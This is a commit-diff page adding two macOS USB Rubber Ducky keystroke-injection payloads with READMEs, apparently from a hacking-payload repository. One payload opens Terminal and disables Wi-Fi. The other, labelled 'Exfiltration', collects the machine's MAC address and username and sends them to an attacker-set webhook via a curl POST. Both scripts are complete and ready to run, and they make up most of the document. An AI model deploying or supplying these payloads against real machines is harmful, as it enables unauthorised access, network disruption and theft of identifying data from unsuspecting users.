Compare commits
7 Commits
ec7987eb8e
...
e1029b94f0
Author | SHA1 | Date |
---|---|---|
&MF#CTg*fWz6H^nV | e1029b94f0 | |
Peaks | 7f56669213 | |
Peaks | 645f1e9fe3 | |
bst04 | 59d4883817 | |
Aleff | 1ea9c8a689 | |
bst04 | b9de56e67d | |
bst04 | 0403e79d70 |
|
@ -0,0 +1,24 @@
|
||||||
|
# Disable WiFi 🛜
|
||||||
|
|
||||||
|
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Disable WiFi
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Execution
|
||||||
|
- **Target**: MacOS
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||||
|
`DEFINE #MODE off`
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Terminal**.
|
||||||
|
- Run or stop the WiFi
|
|
@ -0,0 +1,53 @@
|
||||||
|
REM_BLOCK
|
||||||
|
##################################
|
||||||
|
# #
|
||||||
|
# Title : Disable WiFi #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Execution #
|
||||||
|
# Target : MacOS #
|
||||||
|
# #
|
||||||
|
##################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||||
|
DEFINE #MODE off
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN TERMINAL
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
|
||||||
|
DELAY 250
|
||||||
|
GUI q
|
|
@ -0,0 +1,25 @@
|
||||||
|
# Exfiltrate Mac Address - MacOS
|
||||||
|
|
||||||
|
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Exfiltrate Mac Address
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Exfiltration
|
||||||
|
- **Target**: MacOS
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- Set the #WEBHOOK to complete the exfiltration
|
||||||
|
`DEFINE #WEBHOOK example`
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Terminal**.
|
||||||
|
- Acquire the mac address and the system user name
|
||||||
|
- Send this informations through the Webhook
|
|
@ -0,0 +1,55 @@
|
||||||
|
REM_BLOCK
|
||||||
|
####################################################
|
||||||
|
# #
|
||||||
|
# Title : Exfiltrate Mac Address - MacOS #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Exfiltration #
|
||||||
|
# Target : MacOS #
|
||||||
|
# #
|
||||||
|
####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Set the #WEBHOOK to complete the exfiltration
|
||||||
|
DEFINE #WEBHOOK example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN TERMINAL
|
||||||
|
DELAY 750
|
||||||
|
STRINGLN mac=$(networksetup -getmacaddress en0)
|
||||||
|
DELAY 750
|
||||||
|
STRINGLN name=$(id -un)
|
||||||
|
DELAY 850
|
||||||
|
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
|
Loading…
Reference in New Issue